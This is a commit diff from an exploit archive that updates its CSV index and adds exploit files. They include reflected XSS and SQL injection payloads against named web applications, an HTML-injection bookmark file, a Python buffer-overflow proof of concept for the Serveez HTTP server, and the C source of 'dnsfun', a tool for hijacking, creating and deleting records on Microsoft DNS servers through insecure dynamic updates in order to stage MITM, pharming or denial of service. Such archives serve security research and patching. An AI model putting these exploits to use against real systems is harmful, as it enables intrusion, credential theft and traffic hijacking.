Updated 09_02_2014
This commit is contained in:
parent
e410e91c29
commit
eb388cdbdd
15 changed files with 523 additions and 373 deletions
16
files.csv
16
files.csv
|
@ -3204,7 +3204,7 @@ id,file,description,date,author,platform,type,port
|
|||
3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit",2007-03-22,"Umesh Wanve",windows,remote,69
|
||||
3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 (BASE) Remote File Inclusion Vulnerabilities",2007-03-22,GoLd_M,php,webapps,0
|
||||
3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 (idnews) Remote SQL Injection Exploit",2007-03-22,"Mehmet Ince",php,webapps,0
|
||||
3544,platforms/windows/remote/3544.c,"Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0
|
||||
3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0
|
||||
3545,platforms/php/webapps/3545.txt,"LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities",2007-03-22,Kacper,php,webapps,0
|
||||
3546,platforms/asp/webapps/3546.txt,"aspWebCalendar 4.5 (calendar.asp eventid) SQL Injection Vulnerability",2007-03-22,parad0x,asp,webapps,0
|
||||
3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service Exploit",2007-03-22,DiGitalX,windows,dos,0
|
||||
|
@ -31039,7 +31039,8 @@ id,file,description,date,author,platform,type,port
|
|||
34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0
|
||||
34460,platforms/windows/dos/34460.py,"Sonique 2.0 '.xpl' File Remote Stack-Based Buffer Overflow Vulnerability",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0
|
||||
34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution Vulnerability",2014-08-29,"Claudio Viviani",multiple,remote,0
|
||||
34463,platforms/windows/local/34463.py,"HTML Help Workshop 1.4 - (SEH) Buffer Overflow",2014-08-29,"Moroccan Kingdom (MKD)",windows,local,0
|
||||
34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass Vulnerability",2010-08-13,"Emmanuel Bouillon",windows,remote,0
|
||||
34463,platforms/windows/dos/34463.py,"HTML Help Workshop 1.4 - (SEH) Buffer Overflow",2014-08-29,"Moroccan Kingdom (MKD)",windows,dos,0
|
||||
34464,platforms/php/webapps/34464.txt,"SyntaxCMS 'rows_per_page' Parameter SQL Injection Vulnerability",2010-08-10,"High-Tech Bridge SA",php,webapps,0
|
||||
34465,platforms/hardware/remote/34465.txt,"F5 Big-IP - Unauthenticated rsync Access",2014-08-29,Security-Assessment.com,hardware,remote,22
|
||||
34466,platforms/php/webapps/34466.txt,"CMS Source Multiple Input Validation Vulnerabilities",2010-08-13,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -31064,3 +31065,14 @@ id,file,description,date,author,platform,type,port
|
|||
34485,platforms/php/webapps/34485.txt,"FreeSchool 'key_words' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0
|
||||
34486,platforms/php/webapps/34486.txt,"PHPCMS2008 'download.php' Information Disclosure Vulnerability",2009-10-19,Securitylab.ir,php,webapps,0
|
||||
34487,platforms/php/webapps/34487.txt,"Facil Helpdesk kbase/kbase.php URI XSS",2009-08-07,Moudi,php,webapps,0
|
||||
34492,platforms/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition Multiple Cross Site Scripting Vulnerabilities",2009-08-10,Moudi,asp,webapps,0
|
||||
34493,platforms/php/webapps/34493.txt,"PPScript 'shop.htm' SQL Injection Vulnerability",2009-08-03,MizoZ,php,webapps,0
|
||||
34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk products.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
|
||||
34495,platforms/php/webapps/34495.txt,"ViArt Helpdesk article.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
|
||||
34496,platforms/php/webapps/34496.txt,"ViArt Helpdesk product_details.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
|
||||
34497,platforms/php/webapps/34497.txt,"ViArt Helpdesk reviews.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
|
||||
34498,platforms/php/webapps/34498.txt,"ViArt Helpdesk forum.php forum_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
|
||||
34499,platforms/php/webapps/34499.txt,"ViArt Helpdesk products_search.php search_category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
|
||||
34500,platforms/multiple/remote/34500.html,"Flock Browser 3.0.0 Malformed Bookmark HTML Injection Vulnerability",2010-08-19,Lostmon,multiple,remote,0
|
||||
34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me 'answers.php' Cross-Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0
|
||||
34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 'If-Modified-Since' Header Stack Buffer Overflow Vulnerability",2009-08-09,"lvac lvac",windows,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
11
platforms/asp/webapps/34492.txt
Executable file
11
platforms/asp/webapps/34492.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/42535/info
|
||||
|
||||
Online Work Order Suite Lite Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Online Work Order Suite Lite Edition 3.10 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/demo/owoslite/default.asp?show="><script>alert(document.cookie);</script>
|
||||
http://www.example.com/demo/owoslite/login.asp?go="><script>alert(document.cookie);</script>
|
||||
http://www.example.com/demo/owoslite/report.asp?show="><script>alert(document.cookie);</script>
|
9
platforms/multiple/remote/34500.html
Executable file
9
platforms/multiple/remote/34500.html
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/42556/info
|
||||
|
||||
Flock Browser is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
Versions prior to Flock 3.0.0.4094 are vulnerable.
|
||||
|
||||
<!DOCTYPE NETSCAPE-Bookmark-file-1> <!-- This is an automatically generated file. It will be read and overwritten. DO NOT EDIT! --> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"> <TITLE>Bookmarks</TITLE> <H1>Menú Marcadores</H1> <DL><p> <DT><A HREF="http://www.example.com" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">"><script src='http://www.example.com/thirdparty/scripts/ckers.org.js'></A> </DL><p>
|
10
platforms/php/webapps/34493.txt
Executable file
10
platforms/php/webapps/34493.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/42539/info
|
||||
|
||||
PPScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
|
||||
http://www.example.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())
|
||||
http://www.example.com/shop.htm?cid=31+and+1=1
|
||||
http://www.example.com/shop.htm?cid=31+and+1=100
|
7
platforms/php/webapps/34494.txt
Executable file
7
platforms/php/webapps/34494.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42543/info
|
||||
|
||||
ViArt Helpdesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
httpwww.example.com/helpdesk-demo/products.php?category_id=1>"><ScRiPt %0D%0A>alert(414577246752)%3B</ScRiPt>
|
7
platforms/php/webapps/34495.txt
Executable file
7
platforms/php/webapps/34495.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42543/info
|
||||
|
||||
ViArt Helpdesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
httpwww.example.com/helpdesk-demo/article.php?category_id=1--><ScRiPt %0D%0A>alert(516318270235)%3B</ScRiPt>
|
7
platforms/php/webapps/34496.txt
Executable file
7
platforms/php/webapps/34496.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42543/info
|
||||
|
||||
ViArt Helpdesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
httpwww.example.com/helpdesk-demo/product_details.php?category_id=1>"><ScRiPt %0D%0A>alert(414577246752)%3B</ScRiPt>
|
7
platforms/php/webapps/34497.txt
Executable file
7
platforms/php/webapps/34497.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42543/info
|
||||
|
||||
ViArt Helpdesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
httpwww.example.com/helpdesk-demo/reviews.php?category_id=1>"><ScRiPt %0D%0A>alert(414577246752)%3B</ScRiPt>
|
7
platforms/php/webapps/34498.txt
Executable file
7
platforms/php/webapps/34498.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42543/info
|
||||
|
||||
ViArt Helpdesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
httpwww.example.com/helpdesk-demo/forum.php?forum_id=1>"><ScRiPt %0D%0A>alert(414577246752)%3B</ScRiPt>
|
7
platforms/php/webapps/34499.txt
Executable file
7
platforms/php/webapps/34499.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42543/info
|
||||
|
||||
ViArt Helpdesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
httpwww.example.com/helpdesk-demo/products_search.php?search_category_id=1>"><ScRiPt %0D%0A>alert(414577246752)%3B</ScRiPt>
|
9
platforms/php/webapps/34501.txt
Executable file
9
platforms/php/webapps/34501.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/42558/info
|
||||
|
||||
Hitron Soft Answer Me is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Answer Me 1.0 is vulnerable; other versions may be affected.
|
||||
|
||||
http://www.example.com/answers?q_id=1>"><ScRiPt %0D%0A>alert(413587968783)%3B</ScRiPt>
|
50
platforms/windows/dos/34502.py
Executable file
50
platforms/windows/dos/34502.py
Executable file
|
@ -0,0 +1,50 @@
|
|||
source: http://www.securityfocus.com/bid/42560/info
|
||||
|
||||
Serveez is prone to a remote stack-based buffer-overflow vulnerability.
|
||||
|
||||
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
|
||||
|
||||
Serveez 0.1.7 is vulnerable; other versions may also be affected.
|
||||
|
||||
#!/usr/bin/env python
|
||||
#
|
||||
# (,_ ,_, _,) SERVEEZ (HTTP SERVER) <= 0.1.7 (,_ ,_, _,)
|
||||
# /|\`-._( )_.-'/|\ REMOTE BUFFER OVERFLOW POC /|\`-._( )_.-'/|\
|
||||
# / | \`'-/ \-'`/ | \ AUTHOR: LORD VENOM ANTICHRIST / | \`'-/ \-'`/ | \
|
||||
# / |_.'-.\ /.-'._| \ <lvaclvaclvac@gmail.com> / |_.'-.\ /.-'._| \
|
||||
# /_.-' " `-._\ GRETZ TO ALL HEAVY METAL MUSIC /_.-' " `-._\
|
||||
#
|
||||
|
||||
import sys, socket
|
||||
|
||||
try:
|
||||
host = sys.argv[1]
|
||||
port = int(sys.argv[2]) # OFTEN 42422
|
||||
path = sys.argv[3] # MUST EXIST
|
||||
except:
|
||||
print "LAMER"
|
||||
exit(1)
|
||||
|
||||
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
soc.connect((host, port))
|
||||
req = "GET " + path + " HTTP/1.0\r\nIf-Modified-Since: " + ("A" * 50) + "\r\n\r\n"
|
||||
# WE RULE OVER EIP! (EVIL INCARNATE PENTAGRAM)
|
||||
soc.send(req)
|
||||
print "DONE"
|
||||
satan = 666
|
||||
except:
|
||||
print "CAN'T CONNECT"
|
||||
exit(2)
|
||||
|
||||
exit(0)
|
||||
|
||||
# ,
|
||||
# (@|
|
||||
# ,, ,)|_____________________________________
|
||||
# //\\8@8@8@8@8@8 / _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ \ OBEY THE MERCYLESS SWORD
|
||||
# \\//8@8@8@8@8@8 \_____________________________________/ OF SATANIC METAL POWER
|
||||
# `` `)|
|
||||
# (@|
|
||||
# `
|
||||
|
7
platforms/windows/remote/34462.txt
Executable file
7
platforms/windows/remote/34462.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/42435/info
|
||||
|
||||
The Microsoft Windows implementation of Kerberos is prone to a security-bypass vulnerability.
|
||||
|
||||
Successful exploits may allow attackers to gain unauthorized access to affected computers through replay attacks.
|
||||
|
||||
http://www.exploit-db.com/sploits/34462-2.tar.gz
|
|
@ -1,371 +1,371 @@
|
|||
/*
|
||||
Exploiting Microsoft DNS Dynamic Updates for Fun and profit
|
||||
Andres Tarasco Acuña - (c) 2007
|
||||
Url: http://www.514.es
|
||||
|
||||
|
||||
By default, most Microsoft DNS servers integrated with active directory allow
|
||||
insecure dynamic updates for dns records.
|
||||
This feature allows remote users to create, change and delete DNS records.
|
||||
There are several attack scenarios:
|
||||
|
||||
+ MITM attacks: Changing dns records for the network proxy and relay HTTP queries.
|
||||
This attack vector is the most reliable and also allows us to exploit automatic
|
||||
updates for most Windows software, by deploying custom binaries to the client.
|
||||
|
||||
+ Denial of service: by deleting / changing critical dns records
|
||||
|
||||
+ Pharming: like mitm attacks, poisoning several dns records.
|
||||
|
||||
dnsfun exploits that weak configuration and allows remote users to modify dns records.
|
||||
Here are some examples of what can be done. Example:
|
||||
|
||||
|
||||
D:\DNSfun>ping -n 1 FakeProxy.fooooo.com
|
||||
Haciendo ping a FakeProxy.fooooo.com [66.6.66.6] con 32 bytes de datos:
|
||||
|
||||
D:\DNSfun>dnsfun.exe -s 10.100.1.1 -q proxy.mydomain -u 66.6.66.6
|
||||
Microsoft Dynamic DNS Updates - Proof of Concept
|
||||
http://www.514.es - (c) 2007 Andres Tarasco Acuña
|
||||
|
||||
[+] Trying to resolve Host: proxy.mydomain (Dns Server 10.100.1.1)
|
||||
[+] Host proxy.mydomain resolved as 192.168.1.200
|
||||
[+] Trying to set ip address of the host proxy.mydomain to 66.6.66.6
|
||||
[+] Trying Nonsecure Dynamic Update...
|
||||
[?] Host Updated. Checking...(0)
|
||||
[+] Host proxy.mydomain resolved as 66.6.66.6
|
||||
|
||||
D:\DNSfun>dnsfun.exe -s 10.100.1.1 -cc atarasco.mydomain.com -u www.514.es
|
||||
Microsoft Dynamic DNS Updates - Proof of Concept
|
||||
http://www.514.es - (c) 2007 Andres Tarasco Acuña
|
||||
|
||||
[+] Gathering Credentials..
|
||||
[+] Creating DNS CName Record for atarasco.mydomain.com (www.514.es)
|
||||
[+] Host Created. Rechecking Record...
|
||||
[+] Host atarasco.mydomain.com resolved as CNAME www.514.es
|
||||
|
||||
This isn't a new vulnerability but AFAIK those attack vectors were never exploited.
|
||||
|
||||
Check the usage function for more information
|
||||
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <winsock2.h>
|
||||
#include <Windns.h>
|
||||
#pragma comment(lib,"Dnsapi.lib")
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
|
||||
char TargetDnsServer[256]=""; // -s
|
||||
char TargetDnsRecord[256]=""; // -q
|
||||
char NewIpAddress[256]=""; // -i
|
||||
char DeleteDnsRecord[256]=""; //-d
|
||||
char CreateDnsRecord[256]="";
|
||||
|
||||
WORD CreationType=DNS_TYPE_A;
|
||||
|
||||
#define DELETERECORD (DeleteDnsRecord[0]!='\0')
|
||||
#define UPDATERECORD ( (TargetDnsRecord[0]!='\0') && (NewIpAddress[0]!='\0') )
|
||||
#define CREATERECORD ( (CreateDnsRecord[0]!='\0') && (NewIpAddress[0]!='\0') )
|
||||
#define QUERYRECORD (TargetDnsRecord[0]!='\0')
|
||||
#define _DBG_
|
||||
#undef _DBG_
|
||||
|
||||
void usage(char *argv[]);
|
||||
|
||||
|
||||
DNS_RECORDA *DnsQueryA(char *name,IP4_ARRAY *servers)
|
||||
{
|
||||
|
||||
DNS_STATUS status;
|
||||
WORD type= DNS_TYPE_ANY;
|
||||
DWORD fOptions=DNS_QUERY_BYPASS_CACHE | DNS_QUERY_NO_LOCAL_NAME |DNS_QUERY_NO_HOSTS_FILE | DNS_QUERY_NO_NETBT | DNS_QUERY_TREAT_AS_FQDN;
|
||||
PVOID* reserved=NULL;
|
||||
DNS_RECORDA *records=(PDNS_RECORDA)malloc(sizeof(DNS_RECORDA));
|
||||
DNS_RECORDA *result;
|
||||
IN_ADDR ipaddr;
|
||||
int i;
|
||||
int count=0;
|
||||
|
||||
if (!name) {
|
||||
return (NULL);
|
||||
} else {
|
||||
memset(records,'\0',sizeof(DNS_RECORDA));
|
||||
status = DnsQuery_A( name, //PCWSTR pszName,
|
||||
type, //WORD wType,
|
||||
fOptions, //DWORD fOptions,
|
||||
servers, //PIP4_ARRAY aipServers,
|
||||
(DNS_RECORDA**)&records, //PDNS_RECORD* ppQueryResultsSet,
|
||||
reserved ); //PVOID* pReserved
|
||||
|
||||
if (status == ERROR_SUCCESS)
|
||||
{
|
||||
fflush(stdout);
|
||||
result=records;
|
||||
do {
|
||||
#ifdef _DBG_
|
||||
printf("[+] Record %i---\n",count);
|
||||
count++;
|
||||
printf("[+] DNS wDataLength %i\n",result->wDataLength);
|
||||
printf("[+] DNS Flags DW: %x\n",result->Flags.DW);
|
||||
printf("[+] DNS Flags S.Section: %x\n",result->Flags.S.Section);
|
||||
printf("[+] DNS Flags S.Delete: %x\n",result->Flags.S.Delete);
|
||||
printf("[+] DNS Flags S.CharSet: %x\n",result->Flags.S.CharSet);
|
||||
printf("[+] DNS Flags S.Unused: %x\n",result->Flags.S.Unused);
|
||||
printf("[+] DNS Flags S.Reserved: %x\n",result->Flags.S.Reserved);
|
||||
#endif
|
||||
switch (result->wType) {
|
||||
case DNS_TYPE_A:
|
||||
ipaddr.S_un.S_addr = (result->Data.A.IpAddress);
|
||||
printf("[+] Host %s resolved as %s\n", result->pName,inet_ntoa(ipaddr));
|
||||
break;
|
||||
case DNS_TYPE_NS:
|
||||
printf("[+] Domain %s Dns Servers: %s\n",result->pName,result->Data.Ns.pNameHost);
|
||||
break;
|
||||
case DNS_TYPE_CNAME:
|
||||
printf("[+] Host %s resolved as CNAME %s\n", result->pName,result->Data.Cname.pNameHost);
|
||||
//DnsQueryA(result->Data.Cname.pNameHost,servers);
|
||||
break;
|
||||
|
||||
case DNS_TYPE_SOA:
|
||||
printf("[+] SOA Information: PrimaryServer: %s\n",result->Data.Soa.pNamePrimaryServer);
|
||||
printf("[+] SOA Information: Administrator: %s\n",result->Data.Soa.pNameAdministrator);
|
||||
printf("[+] SOA Information: SerialNo %x - Refresh %i - retry %i - Expire %i - DefaultTld %i\n",
|
||||
result->Data.Soa.dwSerialNo,
|
||||
result->Data.Soa.dwRefresh,
|
||||
result->Data.Soa.dwRetry,
|
||||
result->Data.Soa.dwExpire,
|
||||
result->Data.Soa.dwDefaultTtl);
|
||||
break;
|
||||
|
||||
case DNS_TYPE_MX:
|
||||
printf("[+] %s MX Server resolved as %s (Preference %i)\n", result->pName,result->Data.Mx.pNameExchange, result->Data.Mx.wPreference);
|
||||
break;
|
||||
|
||||
case DNS_TYPE_TEXT:
|
||||
printf("[+] Text: %i bytes\n",result->Data.Txt.dwStringCount); //:?
|
||||
break;
|
||||
|
||||
case DNS_TYPE_SRV:
|
||||
printf("[+] SRV Record. NameTarget %s ",result->Data.Srv.pNameTarget);
|
||||
printf("(Priority %i - Port %i - Weigth: %i)\n",result->Data.Srv.wPriority,result->Data.Srv.wPort,result->Data.Srv.wWeight);
|
||||
//printf("[+] Resource Pad %i \n",result->Data.Srv.Pad);
|
||||
break;
|
||||
|
||||
default:
|
||||
printf("[-] DnsQuery returned unknown wtype %x\n",result->wType);
|
||||
break;
|
||||
}
|
||||
result=result->pNext;
|
||||
} while (result!=NULL);
|
||||
} else {
|
||||
if (status==9003) printf("[-] Record not found\n");
|
||||
else printf("[-] Query Error: %i - %i\n",status,GetLastError());
|
||||
exit(-1);
|
||||
}
|
||||
}
|
||||
return records;
|
||||
}
|
||||
/***********************************************************************************************/
|
||||
int main(int argc, char *argv[]) {
|
||||
|
||||
HANDLE creds;
|
||||
DNS_RECORDA *result;
|
||||
DNS_STATUS status;
|
||||
|
||||
HANDLE ContextHandle;
|
||||
DWORD Options=DNS_UPDATE_SECURITY_ON;
|
||||
PVOID pReserved=NULL;
|
||||
IN_ADDR ipaddr;
|
||||
IP4_ARRAY *servers=NULL;
|
||||
SEC_WINNT_AUTH_IDENTITY_A *Credentials=NULL;
|
||||
WORD i;
|
||||
|
||||
printf(" Microsoft Dynamic DNS Updates - Proof of Concept\n");
|
||||
printf(" http://www.514.es - (c) 2007 Andres Tarasco Acuña\n\n");
|
||||
if (argc==1) usage(argv);
|
||||
|
||||
//Init Credentials Struct
|
||||
Credentials = (SEC_WINNT_AUTH_IDENTITY_A *)malloc(sizeof(SEC_WINNT_AUTH_IDENTITY_A));
|
||||
memset(Credentials,'\0',sizeof(SEC_WINNT_AUTH_IDENTITY_A));
|
||||
Credentials->Flags=SEC_WINNT_AUTH_IDENTITY_ANSI;
|
||||
for(i=1;i<argc;i++) {
|
||||
if ( (argv[i][0]=='-') ) {
|
||||
switch (argv[i][1]) {
|
||||
case 's':
|
||||
case 'S':
|
||||
strcpy(TargetDnsServer,argv[i+1]);
|
||||
servers=(PIP4_ARRAY)malloc(sizeof(IP4_ARRAY));
|
||||
servers->AddrCount=1;
|
||||
servers->AddrArray[0]=inet_addr(TargetDnsServer);
|
||||
break;
|
||||
case 'D':
|
||||
case 'd':
|
||||
strcpy(DeleteDnsRecord,argv[i+1]);
|
||||
break;
|
||||
case 'q':
|
||||
case 'Q':
|
||||
strcpy(TargetDnsRecord,argv[i+1]);
|
||||
break;
|
||||
case 'u':
|
||||
case 'U':
|
||||
strcpy(NewIpAddress,argv[i+1]);
|
||||
break;
|
||||
case 'c':
|
||||
case 'C':
|
||||
strcpy(CreateDnsRecord,argv[i+1]);
|
||||
if (NewIpAddress[0]=='\0') strcpy(NewIpAddress,"127.0.0.1");
|
||||
if (argv[i][2]!='\0') {
|
||||
switch (argv[i][2]) {
|
||||
case 'c': CreationType=DNS_TYPE_CNAME;
|
||||
break;
|
||||
case 'a': CreationType=DNS_TYPE_A;
|
||||
break;
|
||||
}
|
||||
}
|
||||
break;
|
||||
/*
|
||||
case 'f':
|
||||
CreateThread( NULL,0,HttpRelayToProxy,(LPVOID) &i,0,&dwThreadId);
|
||||
break;
|
||||
case 'au': //Uauthorization serName
|
||||
Credentials->User=argv[i+1]; Credentials->UserLength=strlen(argv[i+1]); break;
|
||||
case 'ap':
|
||||
Credentials->Password=argv[i+1];Credentials->PasswordLength=strlen(argv[i+1]); break;
|
||||
case 'ad':
|
||||
Credentials->Domain=argv[i+1]; Credentials->DomainLength=strlen(argv[i+1]); break;
|
||||
*/
|
||||
default:
|
||||
printf("[-] Invalid argument: %s\n",argv[i]);
|
||||
usage(argv);
|
||||
break;
|
||||
}
|
||||
i++;
|
||||
} else usage(argv);
|
||||
}
|
||||
|
||||
printf("[+] Gathering Credentials..\n");
|
||||
//http://msdn2.microsoft.com/en-us/library/ms682007.aspx
|
||||
if (Credentials->UserLength==0) {
|
||||
status=DnsAcquireContextHandle(FALSE,NULL,&ContextHandle); //Context with default Credentials
|
||||
} else {
|
||||
status=DnsAcquireContextHandle(FALSE,Credentials,&ContextHandle); //Context with Custom Credentials
|
||||
}
|
||||
|
||||
if (status == ERROR_SUCCESS) {
|
||||
if (CREATERECORD) {
|
||||
|
||||
result=(PDNS_RECORDA)malloc(sizeof(DNS_RECORDA));
|
||||
memset(result,'\0',sizeof(DNS_RECORDA));
|
||||
result->wType=CreationType; //DNS_TYPE_A by default
|
||||
if (CreationType==DNS_TYPE_CNAME) {
|
||||
printf("[+] Creating DNS CName Record for %s (%s)\n",CreateDnsRecord,NewIpAddress);
|
||||
result->Data.Cname.pNameHost=NewIpAddress;
|
||||
} else {
|
||||
printf("[+] Creating DNS A Record for %s (%s)\n",CreateDnsRecord,NewIpAddress);
|
||||
result->Data.A.IpAddress=inet_addr(NewIpAddress);
|
||||
}
|
||||
result->pName=CreateDnsRecord;
|
||||
result->wDataLength=4;
|
||||
result->Flags.S.Section=1;
|
||||
result->Flags.S.CharSet=DnsCharSetAnsi;
|
||||
result->pNext=NULL;
|
||||
|
||||
status=DnsModifyRecordsInSet_A(result, //add record
|
||||
NULL, //delete record
|
||||
Options,
|
||||
ContextHandle,
|
||||
servers,
|
||||
NULL);
|
||||
if (status ==ERROR_SUCCESS) {
|
||||
printf("[+] Host Created. Rechecking Record...\n");
|
||||
DnsRecordListFree(result,DnsFreeRecordList);
|
||||
result=DnsQueryA(CreateDnsRecord,servers);
|
||||
} else {
|
||||
printf("[-] Error: Unable to create %s (%i)\n",CreateDnsRecord,status);
|
||||
}
|
||||
} else if (DELETERECORD) {
|
||||
printf("[+] Trying to resolve Host: %s before deleting\n",DeleteDnsRecord);
|
||||
result=DnsQueryA(DeleteDnsRecord,servers);
|
||||
if (result!=NULL) {
|
||||
printf("[+] Trying to Delete Record. Are You Sure? (Y/N)...");
|
||||
i=getchar(); if (i!='y') return(-1);
|
||||
printf("[+] Deleting record %s\n",DeleteDnsRecord);
|
||||
status=DnsModifyRecordsInSet_A(NULL, //add record
|
||||
result, //delete record
|
||||
Options,
|
||||
ContextHandle,
|
||||
servers,
|
||||
NULL);
|
||||
if (status ==ERROR_SUCCESS) {
|
||||
printf("[+] Host Deleted. Rechecking Record %s...\n",DeleteDnsRecord);
|
||||
DnsRecordListFree(result,DnsFreeRecordList);
|
||||
result=DnsQueryA(DeleteDnsRecord,servers);
|
||||
} else {
|
||||
printf("[-] Error: Unable to Delete %s\n",DeleteDnsRecord);
|
||||
}
|
||||
} else {
|
||||
printf("[-] Host %s not found\n",DeleteDnsRecord);
|
||||
}
|
||||
|
||||
} else if (UPDATERECORD) {
|
||||
// exit(1);
|
||||
printf("[+] Trying to resolve Host: %s before updating\n",TargetDnsRecord);
|
||||
result=DnsQueryA(TargetDnsRecord,servers);
|
||||
if (result->wType==DNS_TYPE_A ) {
|
||||
printf("[+] Trying to update record. Are You Sure? (Y/N)...");
|
||||
i=getchar(); if (i!='y') return(-1);
|
||||
result->Data.A.IpAddress=inet_addr(NewIpAddress);//Modify Dns record
|
||||
ipaddr.S_un.S_addr = (result->Data.A.IpAddress);
|
||||
printf("[+] Trying to set ip address of the host %s to %s \n", TargetDnsRecord,NewIpAddress);//inet_ntoa(ipaddr));
|
||||
printf("[+] Trying to Modify Record...\n");
|
||||
status=DnsReplaceRecordSetA(result,
|
||||
Options, //Attempts nonsecure dynamic update. If refused, then attempts secure dynamic update.
|
||||
ContextHandle,
|
||||
servers,//pServerList,
|
||||
NULL);//pReserved
|
||||
if (status ==ERROR_SUCCESS) {
|
||||
printf("[+] Host Updated. Rechecking Record...\n");
|
||||
DnsRecordListFree(result,DnsFreeRecordList);
|
||||
result=DnsQueryA(TargetDnsRecord,servers);
|
||||
} else {
|
||||
printf("[-] Error: Unable to Delete %s\n",TargetDnsRecord);
|
||||
}
|
||||
|
||||
} else {
|
||||
printf("[-] Unable to Update Record (Type %x)\n",result->wType);
|
||||
}
|
||||
} else if (QUERYRECORD) {
|
||||
printf("[+] Query Information for host %s...\n",TargetDnsRecord);
|
||||
result=DnsQueryA(TargetDnsRecord,servers);
|
||||
DnsRecordListFree(result,DnsFreeRecordList);
|
||||
